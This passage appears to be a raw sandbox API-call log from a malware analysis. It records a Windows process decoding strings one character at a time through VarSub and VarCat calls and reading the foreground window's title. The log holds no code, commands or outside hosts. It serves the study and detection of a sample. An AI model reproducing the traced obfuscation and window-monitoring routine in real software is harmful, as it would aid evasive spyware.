pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.053] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.053] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.054] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.054] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.055] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.055] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.055] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.056] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.056] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.056] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.056] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.057] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.057] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.057] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.058] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.058] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.058] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.059] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.059] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.059] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.059] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.060] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.060] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.060] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.061] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.061] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.061] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.062] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.062] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.062] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.062] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.063] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.063] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.064] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.064] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.064] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.064] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.065] GetForegroundWindow () returned 0x102c2 [0086.065] GetLastError () returned 0x0 [0086.065] SysStringLen (param_1=" ") returned 0xff [0086.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.065] SysStringLen (param_1=" ") returned 0xff [0086.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.065] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.113] GetLastError () returned 0x0 [0086.113] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.113] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.113] SysStringLen (param_1="Activity Arrive Event") returned 0x16 [0086.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activity Arrive Event", cchWideChar=23, lpMultiByteStr=0xe3732c, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activity Arrive Event", lpUsedDefaultChar=0x0) returned 23 [0086.114] SetWindowTextA (hWnd=0x2036e, lpString="Activity Arrive Event") returned 1 [0086.114] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0086.114] GetFocus () returned 0x0 [0086.114] lstrlenA (lpString="Activity Arrive Event") returned 21 [0086.114] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe3732c) returned 0x1 [0086.115] IsWindow (hWnd=0x2036e) returned 1 [0086.115] IsWindow (hWnd=0x2036e) returned 1 [0086.115] IsWindow (hWnd=0x2036e) returned 1 [0086.115] IsWindow (hWnd=0x2036e) returned 1 [0086.116] GetFocus () returned 0x0 [0086.116] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.116] GetFocus () returned 0x0 [0086.116] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x16) returned 0x3102b58 [0086.116] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x16, lParam=0x3102b58) returned 0x15 [0086.116] GetFocus () returned 0x0 [0086.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0086.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0xe3732c, cchWideChar=22 | out: lpWideCharStr="Activity Arrive Event") returned 22 [0086.117] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b58 | out: hHeap=0x30f0000) returned 1 [0086.117] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0086.118] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0086.118] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0086.119] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0086.119] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.120] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.120] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0086.121] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0086.121] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0086.122] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0086.122] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.202] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.203] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.203] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.203] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.204] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.204] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.204] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.205] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.205] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.205] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.206] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.206] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.207] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.207] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.207] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.208] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", 